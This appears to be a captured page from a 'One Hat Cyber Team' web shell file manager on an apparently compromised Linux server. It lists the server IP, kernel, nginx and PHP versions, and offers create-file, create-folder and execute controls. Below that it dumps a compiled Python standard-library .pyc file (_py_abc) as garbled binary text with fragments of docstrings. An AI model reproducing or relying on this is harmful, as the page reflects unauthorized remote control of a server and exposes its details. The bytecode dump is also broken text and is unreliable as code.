⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib
/
python3.12
/
__pycache__
/
View File Name :
_py_abc.cpython-312.pyc
CRh- , d dl mZ d Z G d de Zy) )WeakSetc " t j S )zReturns the current ABC cache token. The token is an opaque object (supporting equality testing) identifying the current version of the ABC cache for virtual subclasses. The token changes with every call to ``register()`` on any ABC. )ABCMeta_abc_invalidation_counter /usr/lib/python3.12/_py_abc.pyget_cache_tokenr s ,,,r c L e Zd ZdZdZ fdZd Zd dZd Zd Z d Z d Z xZS )r ah Metaclass for defining Abstract Base Classes (ABCs). Use this metaclass to create an ABC. An ABC can be subclassed directly, and then acts as a mix-in class. You can also register unrelated concrete classes (even built-in classes) and unrelated ABCs as 'virtual subclasses' -- these and their descendants will be considered subclasses of the registering ABC by the built-in issubclass() function, but the registering ABC won't show up in their MRO (Method Resolution Order) nor will method implementations defined by the registering ABC be callable (not even via super()). r c t | | |||fi |}|j D ch c] \ }}t |dd r| }}}|D ]H }t |dt D ]. }t ||d }t |dd s|j | 0 J t | |_ t |_ t |_ t |_ t j |_ |S c c}}w )N__isabstractmethod__F__abstractmethods__)super__new__itemsgetattrsetadd frozensetr r _abc_registry _abc_cache_abc_negative_cacher r _abc_negative_cache_version) mclsnamebases namespacekwargsclsvalue abstractsbase __class__s r r zABCMeta.__new__# s godD%EfE )2(9G(9u'=uE (9 G D&;SUCT405"8%@MM$' D #,I"6#I "))*1*K*K' Gs C%c t |t st d t || r|S t | | rt d | j j | t xj dz c_ |S )zsRegister a virtual subclass of an ABC. Returns the subclass, to allow usage as a class decorator. zCan only register classesz'Refusing to create an inheritance cycle ) isinstancetype TypeError issubclassRuntimeErrorr r r r )r subclasss r registerzABCMeta.register6 sk (D)788h$O c8$HIIh'))Q.)r c : t d| j d| j | t dt | | j D ]M }|j d st | | }t |t rt | }t | d|| O y)z'Debug helper to print the ABC registry.zClass: .)filezInv. counter: _abc_z: N) print __module____qualname__r __dict__ startswithr r&